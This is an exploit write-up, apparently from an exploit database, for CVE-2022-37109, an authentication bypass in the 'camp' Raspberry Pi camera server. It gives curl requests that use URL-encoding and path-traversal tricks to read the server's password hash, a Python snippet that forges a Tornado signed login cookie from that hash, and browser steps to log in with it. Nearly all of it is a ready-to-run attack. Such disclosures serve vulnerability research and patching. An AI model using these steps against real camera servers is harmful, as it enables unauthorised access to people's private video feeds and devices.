Raspberry Pi Camera Server 1.0 Authentication Bypass

`# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass  
# Date: 2022-07-25  
# Exploit Author: Elias Hohl  
# Vendor Homepage: https://github.com/patrickfuller  
# Software Link: https://github.com/patrickfuller/camp  
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1  
# Tested on: Ubuntu 20.04  
# CVE : CVE-2022-37109  
  
"camp" Raspberry Pi camera server Authentication Bypass vulnerability  
  
https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904  
  
1. Start an instance of the "camp" server:  
python3 server.py --require-login  
  
2. Fetch the SHA-512 password hash using one of these methods:  
  
curl http://localhost:8000/static/password.tx%74  
  
OR  
  
curl http://localhost:8000/static/./password.txt --path-as-is  
  
OR  
  
curl http://localhost:8000/static/../camp/password.txt --path-as-is  
  
3. Execute the following python snippet (replace the hash with the hash you received in step 2).  
  
from tornado.web import create_signed_value  
import time  
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))  
  
4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.  
  
  
`